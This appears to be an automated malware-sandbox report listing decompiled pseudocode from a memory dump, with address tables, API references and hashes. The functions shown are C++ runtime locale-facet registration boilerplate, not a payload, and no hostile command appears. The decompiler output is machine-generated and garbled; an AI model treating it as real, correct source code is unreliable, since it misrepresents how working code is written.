0x0048cb63
0x00000000
0x0048cb63
0x0048cb61
0x0048cae5
0x0048cae5
0x0048cae8
0x0048caec
0x0048caf0
0x0048cafd
0x0048cb05
0x0048cb07
0x00000000
0x0048cb07
0x0048cace
0x0048cace
0x00000000
0x0048cace
0x0048cacc
0x0048ca50
0x0048ca50
0x0048ca53
0x0048ca57
0x0048ca5b
0x0048ca68
0x0048ca70
0x0048ca72
0x00000000
0x0048ca72
0x0048ca39
0x0048ca39
0x00000000
0x0048ca39
0x0048ca37
0x0048c9bb
0x0048c9bb
0x0048c9be
0x0048c9c2
0x0048c9c6
0x0048c9d3
0x0048c9db
0x0048c9dd
0x00000000
0x0048c9dd
0x0048c9a4
0x0048c9a4
0x00000000
0x0048c9a4
0x0048c9a2

APIs

__EH_prolog3.LIBCMT ref: 0048C96B
std::_Lockit::_Lockit.LIBCPMT ref: 0048C975

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

moneypunct.LIBCPMT ref: 0048C9AF
std::_Facet_Register.LIBCPMT ref: 0048C9C6
std::_Lockit::~_Lockit.LIBCPMT ref: 0048C9E6
Concurrency::cancel_current_task.LIBCPMT ref: 0048C9F3

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registermoneypunct
String ID:
API String ID: 1799738296-0
Opcode ID: d1523916864bcae98330d0836f27d8ea40860cce7d2d318f737c4f53f3d35e3b
Instruction ID: 95a2346c1a0a3255d5a5c53942570fb07094c7ba08130a60f44e227e225ebaca
Opcode Fuzzy Hash: d1523916864bcae98330d0836f27d8ea40860cce7d2d318f737c4f53f3d35e3b
Instruction Fuzzy Hash: 6C01ED71D0021A8BCB05FB65D856ABE7761BF80314F14084EE811AB382CF7C9E008799

Uniqueness

Uniqueness Score: -1.00%

Function 0048C9F9, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0048C9F9(intOrPtr _a8) {
				signed int _v4;
				signed int _v16;
				char _v20;
				void* _v128;
				signed int _t141;
				void* _t256;
				short* _t370;
				void* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				void* _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				short* _t428;
				void* _t444;
				void* _t445;

				_push(8);
				E0049D90B(0x4d6966, _t404, _t416);
				E00488DEA( &_v20, 0);
				_t417 =  *0x4eddec; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t417;
				_t141 = E0042B315(_a8, E0042B22E(0x4edd98, _t404, _t417, _t445));
				_t405 = _t141;
				if(_t141 != 0) {
					L5:
					E00488E42( &_v20);
					return E0049D8D4(_t405);
				} else {
					if(_t417 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E0048E3E2(_t405, _t417, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E0042B042(__eflags);
							asm("int3");
							_push(8);
							E0049D90B(0x4d6966, _t405, _t417);
							E00488DEA( &_v20, 0);
							_t418 =  *0x4ede00; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t418;
							_t406 = E0042B315(_a8, E0042B22E(0x4edda4, _t405, _t418, __eflags));
							__eflags = _t406;
							if(_t406 != 0) {
								L12:
								E00488E42( &_v20);
								return E0049D8D4(_t406);
							} else {
								__eflags = _t418;
								if(__eflags == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E0048E467(_t406, _t418, __eflags) - 0xffffffff;
									if(__eflags == 0) {
										E0042B042(__eflags);
										asm("int3");
										_push(8);
										E0049D90B(0x4d6966, _t406, _t418);
										E00488DEA( &_v20, 0);
										_t419 =  *0x4eddd0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t419;
										_t407 = E0042B315(_a8, E0042B22E(0x4edd7c, _t406, _t419, __eflags));
										__eflags = _t407;
										if(_t407 != 0) {
											L19:
											E00488E42( &_v20);
											return E0049D8D4(_t407);
										} else {
											__eflags = _t419;
											if(__eflags == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E0048E4CF(_t407, _t419, __eflags) - 0xffffffff;
												if(__eflags == 0) {
													E0042B042(__eflags);
													asm("int3");
													_push(8);
													E0049D90B(0x4d6966, _t407, _t419);
													E00488DEA( &_v20, 0);
													_t420 =  *0x4ede04; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t420;
													_t408 = E0042B315(_a8, E0042B22E(0x4edda8, _t407, _t420, __eflags));
													__eflags = _t408;
													if(_t408 != 0) {
														L26:
														E00488E42( &_v20);
														return E0049D8D4(_t408);
													} else {
														__eflags = _t420;
														if(__eflags == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E0048E537(_t408, _t420, __eflags) - 0xffffffff;
															if(__eflags == 0) {
																E0042B042(__eflags);
																asm("int3");
																_push(8);
																E0049D90B(0x4d6966, _t408, _t420);
																E00488DEA( &_v20, 0);
																_t421 =  *0x4eddd4; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t421;
																_t409 = E0042B315(_a8, E0042B22E(0x4edd80, _t408, _t421, __eflags));
																__eflags = _t409;
																if(_t409 != 0) {
																	L33:
																	E00488E42( &_v20);
																	return E0049D8D4(_t409);
																} else {
																	__eflags = _t421;
																	if(__eflags == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E0048E59F(_t409, _t421, __eflags) - 0xffffffff;
																		if(__eflags == 0) {
																			E0042B042(__eflags);
																			asm("int3");
																			_push(8);
																			E0049D90B(0x4d6966, _t409, _t421);
																			E00488DEA( &_v20, 0);
																			_t422 =  *0x4ede08; // 0x0
																			_v4 = _v4 & 0x00000000;
																			_v16 = _t422;
																			_t410 = E0042B315(_a8, E0042B22E(0x4eddac, _t409, _t422, __eflags));
																			__eflags = _t410;
																			if(_t410 != 0) {
																				L40:
																				E00488E42( &_v20);
																				return E0049D8D4(_t410);
																			} else {
																				__eflags = _t422;
																				if(__eflags == 0) {
																					_push(_a8);
																					_push( &_v16);
																					__eflags = E0048E607(_t410, _t422, __eflags) - 0xffffffff;
																					if(__eflags == 0) {
																						E0042B042(__eflags);
																						asm("int3");
																						_push(8);
																						E0049D90B(0x4d6966, _t410, _t422);
																						E00488DEA( &_v20, 0);
																						_t423 =  *0x4eddd8; // 0x0
																						_v4 = _v4 & 0x00000000;
																						_v16 = _t423;
																						_t411 = E0042B315(_a8, E0042B22E(0x4edd84, _t410, _t423, __eflags));
																						__eflags = _t411;
																						if(_t411 != 0) {
																							L47:
																							E00488E42( &_v20);
																							return E0049D8D4(_t411);
																						} else {
																							__eflags = _t423;
																							if(__eflags == 0) {
																								_push(_a8);
																								_push( &_v16);
																								__eflags = E0048E682(_t411, _t423, __eflags) - 0xffffffff;
																								if(__eflags == 0) {
																									E0042B042(__eflags);
																									asm("int3");
																									_push(8);
																									E0049D90B(0x4d6966, _t411, _t423);
																									E00488DEA( &_v20, 0);
																									_t424 =  *0x4ede24; // 0x0
																									_v4 = _v4 & 0x00000000;
																									_v16 = _t424;
																									_t412 = E0042B315(_a8, E0042B22E(0x4eddc8, _t411, _t424, __eflags));
																									__eflags = _t412;
																									if(_t412 != 0) {
																										L54:
																										E00488E42( &_v20);
																										return E0049D8D4(_t412);
																									} else {
																										__eflags = _t424;
																										if(__eflags == 0) {
																											_push(_a8);
																											_push( &_v16);
																											__eflags = E0048E6FD(_t412, _t424, __eflags) - 0xffffffff;
																											if(__eflags == 0) {
																												E0042B042(__eflags);
																												asm("int3");
																												_push(8);
																												E0049D90B(0x4d6966, _t412, _t424);
																												E00488DEA( &_v20, 0);
																												_t425 =  *0x4eddf4; // 0x0
																												_v4 = _v4 & 0x00000000;
																												_v16 = _t425;
																												_t413 = E0042B315(_a8, E0042B22E(0x4edda0, _t412, _t425, __eflags));
																												__eflags = _t413;
																												if(_t413 != 0) {
																													L61:
																													E00488E42( &_v20);
																													return E0049D8D4(_t413);
																												} else {
																													__eflags = _t425;
																													if(__eflags == 0) {
																														_push(_a8);
																														_push( &_v16);
																														__eflags = E0048E769(_t413, _t425, __eflags) - 0xffffffff;
																														if(__eflags == 0) {
																															E0042B042(__eflags);
																															asm("int3");
																															_push(8);
																															E0049D90B(0x4d6966, _t413, _t425);
																															E00488DEA( &_v20, 0);
																															_t426 =  *0x4ede28; // 0x0
																															_v4 = _v4 & 0x00000000;
																															_v16 = _t426;
																															_t414 = E0042B315(_a8, E0042B22E(0x4eddcc, _t413, _t426, __eflags));
																															__eflags = _t414;
																															if(_t414 != 0) {
																																L68:
																																E00488E42( &_v20);
																																return E0049D8D4(_t414);
																															} else {
																																__eflags = _t426;
																																if(__eflags == 0) {
																																	_push(_a8);
																																	_push( &_v16);
																																	__eflags = E0048E7D5(_t414, _t426, __eflags) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E0042B042(__eflags);
																																		asm("int3");
																																		_push(8);
																																		E0049D90B(0x4d6966, _t414, _t426);
																																		E00488DEA( &_v20, 0);
																																		_t427 =  *0x4eddf8; // 0x0
																																		_v4 = _v4 & 0x00000000;
																																		_v16 = _t427;
																																		_t415 = E0042B315(_a8, E0042B22E(0x4edd78, _t414, _t427, __eflags));
																																		__eflags = _t415;
																																		if(_t415 != 0) {
																																			L75:
																																			E00488E42( &_v20);
																																			return E0049D8D4(_t415);
																																		} else {
																																			__eflags = _t427;
																																			if(__eflags == 0) {
																																				_push(_a8);
																																				_push( &_v16);
																																				_t256 = E0048E849(_t415, _t427, __eflags);
																																				_pop(_t370);
																																				__eflags = _t256 - 0xffffffff;
																																				if(__eflags == 0) {
																																					E0042B042(__eflags);
																																					asm("int3");
																																					_push(_t427);
																																					_t428 = _t370;
																																					_t134 = _t428 + 0x10;
																																					 *_t134 =  *(_t428 + 0x10) & 0x00000000;
																																					__eflags =  *_t134;
																																					 *((intOrPtr*)(_t428 + 0x14)) = 7;
																																					 *_t428 = 0;
																																					E00494BE0( *((intOrPtr*)(_t444 + 8)));
																																					return _t428;
																																				} else {
																																					_t415 = _v16;
																																					_v16 = _t415;
																																					_v4 = 1;
																																					E0048919D(_t415);
																																					 *0x4f02b4();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 4))))();
																																					 *0x4eddf8 = _t415;
																																					goto L75;
																																				}
																																			} else {
																																				_t415 = _t427;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t414 = _v16;
																																		_v16 = _t414;
																																		_v4 = 1;
																																		E0048919D(_t414);
																																		 *0x4f02b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t414 + 4))))();
																																		 *0x4ede28 = _t414;
																																		goto L68;
																																	}
																																} else {
																																	_t414 = _t426;
																																	goto L68;
																																}
																															}
																														} else {
																															_t413 = _v16;
																															_v16 = _t413;
																															_v4 = 1;
																															E0048919D(_t413);
																															 *0x4f02b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 4))))();
																															 *0x4eddf4 = _t413;
																															goto L61;
																														}
																													} else {
																														_t413 = _t425;
																														goto L61;
																													}
																												}
																											} else {
																												_t412 = _v16;
																												_v16 = _t412;
																												_v4 = 1;
																												E0048919D(_t412);
																												 *0x4f02b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t412 + 4))))();
																												 *0x4ede24 = _t412;
																												goto L54;
																											}
																										} else {
																											_t412 = _t424;
																											goto L54;
																										}
																									}
																								} else {
																									_t411 = _v16;
																									_v16 = _t411;
																									_v4 = 1;
																									E0048919D(_t411);
																									 *0x4f02b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t411 + 4))))();
																									 *0x4eddd8 = _t411;
																									goto L47;
																								}
																							} else {
																								_t411 = _t423;
																								goto L47;
																							}
																						}
																					} else {
																						_t410 = _v16;
																						_v16 = _t410;
																						_v4 = 1;
																						E0048919D(_t410);
																						 *0x4f02b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t410 + 4))))();
																						 *0x4ede08 = _t410;
																						goto L40;
																					}
																				} else {
																					_t410 = _t422;
																					goto L40;
																				}
																			}
																		} else {
																			_t409 = _v16;
																			_v16 = _t409;
																			_v4 = 1;
																			E0048919D(_t409);
																			 *0x4f02b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t409 + 4))))();
																			 *0x4eddd4 = _t409;
																			goto L33;
																		}
																	} else {
																		_t409 = _t421;
																		goto L33;
																	}
																}
															} else {
																_t408 = _v16;
																_v16 = _t408;
																_v4 = 1;
																E0048919D(_t408);
																 *0x4f02b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t408 + 4))))();
																 *0x4ede04 = _t408;
																goto L26;
															}
														} else {
															_t408 = _t420;
															goto L26;
														}
													}
												} else {
													_t407 = _v16;
													_v16 = _t407;
													_v4 = 1;
													E0048919D(_t407);
													 *0x4f02b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t407 + 4))))();
													 *0x4eddd0 = _t407;
													goto L19;
												}
											} else {
												_t407 = _t419;
												goto L19;
											}
										}
									} else {
										_t406 = _v16;
										_v16 = _t406;
										_v4 = 1;
										E0048919D(_t406);
										 *0x4f02b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t406 + 4))))();
										 *0x4ede00 = _t406;
										goto L12;
									}
								} else {
									_t406 = _t418;
									goto L12;
								}
							}
						} else {
							_t405 = _v16;
							_v16 = _t405;
							_v4 = 1;
							E0048919D(_t405);
							 *0x4f02b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t405 + 4))))();
							 *0x4eddec = _t405;
							goto L5;
						}
					} else {
						_t405 = _t417;
						goto L5;
					}
				}
			}

0x0048c9f9
0x0048ca00
0x0048ca0a
0x0048ca0f
0x0048ca1a
0x0048ca1e
0x0048ca2a
0x0048ca2f
0x0048ca33
0x0048ca78
0x0048ca7b
0x0048ca87
0x0048ca35
0x0048ca37
0x0048ca3d
0x0048ca43
0x0048ca4b
0x0048ca4e
0x0048ca88
0x0048ca8d
0x0048ca8e
0x0048ca95
0x0048ca9f
0x0048caa4
0x0048caaf
0x0048cab3
0x0048cac4
0x0048cac6
0x0048cac8
0x0048cb0d
0x0048cb10
0x0048cb1c
0x0048caca
0x0048caca
0x0048cacc
0x0048cad2
0x0048cad8
0x0048cae0
0x0048cae3
0x0048cb1d
0x0048cb22
0x0048cb23
0x0048cb2a
0x0048cb34
0x0048cb39
0x0048cb44
0x0048cb48
0x0048cb59
0x0048cb5b
0x0048cb5d
0x0048cba2
0x0048cba5
0x0048cbb1
0x0048cb5f
0x0048cb5f
0x0048cb61
0x0048cb67
0x0048cb6d
0x0048cb75
0x0048cb78
0x0048cbb2
0x0048cbb7
0x0048cbb8
0x0048cbbf
0x0048cbc9
0x0048cbce
0x0048cbd9
0x0048cbdd
0x0048cbee
0x0048cbf0
0x0048cbf2
0x0048cc37
0x0048cc3a
0x0048cc46
0x0048cbf4
0x0048cbf4
0x0048cbf6
0x0048cbfc
0x0048cc02
0x0048cc0a
0x0048cc0d
0x0048cc47
0x0048cc4c
0x0048cc4d
0x0048cc54
0x0048cc5e
0x0048cc63
0x0048cc6e
0x0048cc72
0x0048cc83
0x0048cc85
0x0048cc87
0x0048cccc
0x0048cccf
0x0048ccdb
0x0048cc89
0x0048cc89
0x0048cc8b
0x0048cc91
0x0048cc97
0x0048cc9f
0x0048cca2
0x0048ccdc
0x0048cce1
0x0048cce2
0x0048cce9
0x0048ccf3
0x0048ccf8
0x0048cd03
0x0048cd07
0x0048cd18
0x0048cd1a
0x0048cd1c
0x0048cd61
0x0048cd64
0x0048cd70
0x0048cd1e
0x0048cd1e
0x0048cd20
0x0048cd26
0x0048cd2c
0x0048cd34
0x0048cd37
0x0048cd71
0x0048cd76
0x0048cd77
0x0048cd7e
0x0048cd88
0x0048cd8d
0x0048cd98
0x0048cd9c
0x0048cdad
0x0048cdaf
0x0048cdb1
0x0048cdf6
0x0048cdf9
0x0048ce05
0x0048cdb3
0x0048cdb3
0x0048cdb5
0x0048cdbb
0x0048cdc1
0x0048cdc9
0x0048cdcc
0x0048ce06
0x0048ce0b
0x0048ce0c
0x0048ce13
0x0048ce1d
0x0048ce22
0x0048ce2d
0x0048ce31
0x0048ce42
0x0048ce44
0x0048ce46
0x0048ce8b
0x0048ce8e
0x0048ce9a
0x0048ce48
0x0048ce48
0x0048ce4a
0x0048ce50
0x0048ce56
0x0048ce5e
0x0048ce61
0x0048ce9b
0x0048cea0
0x0048cea1
0x0048cea8
0x0048ceb2
0x0048ceb7
0x0048cec2
0x0048cec6
0x0048ced7
0x0048ced9
0x0048cedb
0x0048cf20
0x0048cf23
0x0048cf2f
0x0048cedd
0x0048cedd
0x0048cedf
0x0048cee5
0x0048ceeb
0x0048cef3
0x0048cef6
0x0048cf30
0x0048cf35
0x0048cf36
0x0048cf3d
0x0048cf47
0x0048cf4c
0x0048cf57
0x0048cf5b
0x0048cf6c
0x0048cf6e
0x0048cf70
0x0048cfb5
0x0048cfb8
0x0048cfc4
0x0048cf72
0x0048cf72
0x0048cf74
0x0048cf7a
0x0048cf80
0x0048cf88
0x0048cf8b
0x0048cfc5
0x0048cfca
0x0048cfcb
0x0048cfd2
0x0048cfdc
0x0048cfe1
0x0048cfec
0x0048cff0
0x0048d001
0x0048d003
0x0048d005
0x0048d04a
0x0048d04d
0x0048d059
0x0048d007
0x0048d007
0x0048d009
0x0048d00f
0x0048d015
0x0048d016
0x0048d01c
0x0048d01d
0x0048d020
0x0048d05a
0x0048d05f
0x0048d063
0x0048d067
0x0048d06b
0x0048d06b
0x0048d06b
0x0048d06f
0x0048d076
0x0048d079
0x0048d082
0x0048d022
0x0048d022
0x0048d025
0x0048d029
0x0048d02d
0x0048d03a
0x0048d042
0x0048d044
0x00000000
0x0048d044
0x0048d00b
0x0048d00b
0x00000000
0x0048d00b
0x0048d009
0x0048cf8d
0x0048cf8d
0x0048cf90
0x0048cf94
0x0048cf98
0x0048cfa5
0x0048cfad
0x0048cfaf
0x00000000
0x0048cfaf
0x0048cf76
0x0048cf76
0x00000000
0x0048cf76
0x0048cf74
0x0048cef8
0x0048cef8
0x0048cefb
0x0048ceff
0x0048cf03
0x0048cf10
0x0048cf18
0x0048cf1a
0x00000000
0x0048cf1a
0x0048cee1
0x0048cee1
0x00000000
0x0048cee1
0x0048cedf
0x0048ce63
0x0048ce63
0x0048ce66
0x0048ce6a
0x0048ce6e
0x0048ce7b
0x0048ce83
0x0048ce85
0x00000000
0x0048ce85
0x0048ce4c
0x0048ce4c
0x00000000
0x0048ce4c
0x0048ce4a
0x0048cdce
0x0048cdce
0x0048cdd1
0x0048cdd5
0x0048cdd9
0x0048cde6
0x0048cdee
0x0048cdf0
0x00000000
0x0048cdf0
0x0048cdb7
0x0048cdb7
0x00000000
0x0048cdb7
0x0048cdb5
0x0048cd39
0x0048cd39
0x0048cd3c
0x0048cd40
0x0048cd44
0x0048cd51
0x0048cd59
0x0048cd5b
0x00000000
0x0048cd5b
0x0048cd22
0x0048cd22
0x00000000
0x0048cd22
0x0048cd20
0x0048cca4
0x0048cca4
0x0048cca7
0x0048ccab
0x0048ccaf
0x0048ccbc
0x0048ccc4
0x0048ccc6
0x00000000
0x0048ccc6
0x0048cc8d
0x0048cc8d
0x00000000
0x0048cc8d
0x0048cc8b
0x0048cc0f
0x0048cc0f
0x0048cc12
0x0048cc16
0x0048cc1a
0x0048cc27
0x0048cc2f
0x0048cc31
0x00000000
0x0048cc31
0x0048cbf8
0x0048cbf8
0x00000000
0x0048cbf8
0x0048cbf6
0x0048cb7a
0x0048cb7a
0x0048cb7d
0x0048cb81
0x0048cb85
0x0048cb92
0x0048cb9a
0x0048cb9c
0x00000000
0x0048cb9c
0x0048cb63
0x0048cb63
0x00000000
0x0048cb63
0x0048cb61
0x0048cae5
0x0048cae5
0x0048cae8
0x0048caec
0x0048caf0
0x0048cafd
0x0048cb05
0x0048cb07
0x00000000
0x0048cb07
0x0048cace
0x0048cace
0x00000000
0x0048cace
0x0048cacc
0x0048ca50
0x0048ca50
0x0048ca53
0x0048ca57
0x0048ca5b
0x0048ca68
0x0048ca70
0x0048ca72
0x00000000
0x0048ca72
0x0048ca39
0x0048ca39
0x00000000
0x0048ca39
0x0048ca37

APIs

__EH_prolog3.LIBCMT ref: 0048CA00
std::_Lockit::_Lockit.LIBCPMT ref: 0048CA0A

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

moneypunct.LIBCPMT ref: 0048CA44
std::_Facet_Register.LIBCPMT ref: 0048CA5B
std::_Lockit::~_Lockit.LIBCPMT ref: 0048CA7B
Concurrency::cancel_current_task.LIBCPMT ref: 0048CA88

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registermoneypunct
String ID:
API String ID: 1799738296-0
Opcode ID: 360424a3084c37d4effaea057f44e6d80938f1ac1cd1c347caa1f02e4829e93b
Instruction ID: 799be2cbe417155a9b2c34543e86482fae44d9e2ebe9b8232dc18b69b0c5f81f
Opcode Fuzzy Hash: 360424a3084c37d4effaea057f44e6d80938f1ac1cd1c347caa1f02e4829e93b
Instruction Fuzzy Hash: 9A01C071D001298BCB05FB65D895ABE7775AF80314F65481FE810AB382CF3C9E018B99

Uniqueness

Uniqueness Score: -1.00%

Function 0048CCE2, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0048CCE2(intOrPtr _a8) {
				signed int _v4;
				signed int _v16;
				char _v20;
				void* _v68;
				signed int _t81;
				void* _t141;
				short* _t205;
				void* _t224;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				void* _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				short* _t238;
				void* _t249;
				void* _t250;

				_push(8);
				E0049D90B(0x4d6966, _t224, _t231);
				E00488DEA( &_v20, 0);
				_t232 =  *0x4ede08; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t232;
				_t81 = E0042B315(_a8, E0042B22E(0x4eddac, _t224, _t232, _t250));
				_t225 = _t81;
				if(_t81 != 0) {
					L5:
					E00488E42( &_v20);
					return E0049D8D4(_t225);
				} else {
					if(_t232 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E0048E607(_t225, _t232, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E0042B042(__eflags);
							asm("int3");
							_push(8);
							E0049D90B(0x4d6966, _t225, _t232);
							E00488DEA( &_v20, 0);
							_t233 =  *0x4eddd8; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t233;
							_t226 = E0042B315(_a8, E0042B22E(0x4edd84, _t225, _t233, __eflags));
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E00488E42( &_v20);
								return E0049D8D4(_t226);
							} else {
								__eflags = _t233;
								if(__eflags == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E0048E682(_t226, _t233, __eflags) - 0xffffffff;
									if(__eflags == 0) {
										E0042B042(__eflags);
										asm("int3");
										_push(8);
										E0049D90B(0x4d6966, _t226, _t233);
										E00488DEA( &_v20, 0);
										_t234 =  *0x4ede24; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t234;
										_t227 = E0042B315(_a8, E0042B22E(0x4eddc8, _t226, _t234, __eflags));
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E00488E42( &_v20);
											return E0049D8D4(_t227);
										} else {
											__eflags = _t234;
											if(__eflags == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E0048E6FD(_t227, _t234, __eflags) - 0xffffffff;
												if(__eflags == 0) {
													E0042B042(__eflags);
													asm("int3");
													_push(8);
													E0049D90B(0x4d6966, _t227, _t234);
													E00488DEA( &_v20, 0);
													_t235 =  *0x4eddf4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t235;
													_t228 = E0042B315(_a8, E0042B22E(0x4edda0, _t227, _t235, __eflags));
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E00488E42( &_v20);
														return E0049D8D4(_t228);
													} else {
														__eflags = _t235;
														if(__eflags == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E0048E769(_t228, _t235, __eflags) - 0xffffffff;
															if(__eflags == 0) {
																E0042B042(__eflags);
																asm("int3");
																_push(8);
																E0049D90B(0x4d6966, _t228, _t235);
																E00488DEA( &_v20, 0);
																_t236 =  *0x4ede28; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t236;
																_t229 = E0042B315(_a8, E0042B22E(0x4eddcc, _t228, _t236, __eflags));
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E00488E42( &_v20);
																	return E0049D8D4(_t229);
																} else {
																	__eflags = _t236;
																	if(__eflags == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E0048E7D5(_t229, _t236, __eflags) - 0xffffffff;
																		if(__eflags == 0) {
																			E0042B042(__eflags);
																			asm("int3");
																			_push(8);
																			E0049D90B(0x4d6966, _t229, _t236);
																			E00488DEA( &_v20, 0);
																			_t237 =  *0x4eddf8; // 0x0
																			_v4 = _v4 & 0x00000000;
																			_v16 = _t237;
																			_t230 = E0042B315(_a8, E0042B22E(0x4edd78, _t229, _t237, __eflags));
																			__eflags = _t230;
																			if(_t230 != 0) {
																				L40:
																				E00488E42( &_v20);
																				return E0049D8D4(_t230);
																			} else {
																				__eflags = _t237;
																				if(__eflags == 0) {
																					_push(_a8);
																					_push( &_v16);
																					_t141 = E0048E849(_t230, _t237, __eflags);
																					_pop(_t205);
																					__eflags = _t141 - 0xffffffff;
																					if(__eflags == 0) {
																						E0042B042(__eflags);
																						asm("int3");
																						_push(_t237);
																						_t238 = _t205;
																						_t74 = _t238 + 0x10;
																						 *_t74 =  *(_t238 + 0x10) & 0x00000000;
																						__eflags =  *_t74;
																						 *((intOrPtr*)(_t238 + 0x14)) = 7;
																						 *_t238 = 0;
																						E00494BE0( *((intOrPtr*)(_t249 + 8)));
																						return _t238;
																					} else {
																						_t230 = _v16;
																						_v16 = _t230;
																						_v4 = 1;
																						E0048919D(_t230);
																						 *0x4f02b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t230 + 4))))();
																						 *0x4eddf8 = _t230;
																						goto L40;
																					}
																				} else {
																					_t230 = _t237;
																					goto L40;
																				}
																			}
																		} else {
																			_t229 = _v16;
																			_v16 = _t229;
																			_v4 = 1;
																			E0048919D(_t229);
																			 *0x4f02b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x4ede28 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t236;
																		goto L33;
																	}
																}
															} else {
																_t228 = _v16;
																_v16 = _t228;
																_v4 = 1;
																E0048919D(_t228);
																 *0x4f02b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x4eddf4 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t235;
															goto L26;
														}
													}
												} else {
													_t227 = _v16;
													_v16 = _t227;
													_v4 = 1;
													E0048919D(_t227);
													 *0x4f02b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x4ede24 = _t227;
													goto L19;
												}
											} else {
												_t227 = _t234;
												goto L19;
											}
										}
									} else {
										_t226 = _v16;
										_v16 = _t226;
										_v4 = 1;
										E0048919D(_t226);
										 *0x4f02b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x4eddd8 = _t226;
										goto L12;
									}
								} else {
									_t226 = _t233;
									goto L12;
								}
							}
						} else {
							_t225 = _v16;
							_v16 = _t225;
							_v4 = 1;
							E0048919D(_t225);
							 *0x4f02b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x4ede08 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t232;
						goto L5;
					}
				}
			}

0x0048cce2
0x0048cce9
0x0048ccf3
0x0048ccf8
0x0048cd03
0x0048cd07
0x0048cd13
0x0048cd18
0x0048cd1c
0x0048cd61
0x0048cd64
0x0048cd70
0x0048cd1e
0x0048cd20
0x0048cd26
0x0048cd2c
0x0048cd34
0x0048cd37
0x0048cd71
0x0048cd76
0x0048cd77
0x0048cd7e
0x0048cd88
0x0048cd8d
0x0048cd98
0x0048cd9c
0x0048cdad
0x0048cdaf
0x0048cdb1
0x0048cdf6
0x0048cdf9
0x0048ce05
0x0048cdb3
0x0048cdb3
0x0048cdb5
0x0048cdbb
0x0048cdc1
0x0048cdc9
0x0048cdcc
0x0048ce06
0x0048ce0b
0x0048ce0c
0x0048ce13
0x0048ce1d
0x0048ce22
0x0048ce2d
0x0048ce31
0x0048ce42
0x0048ce44
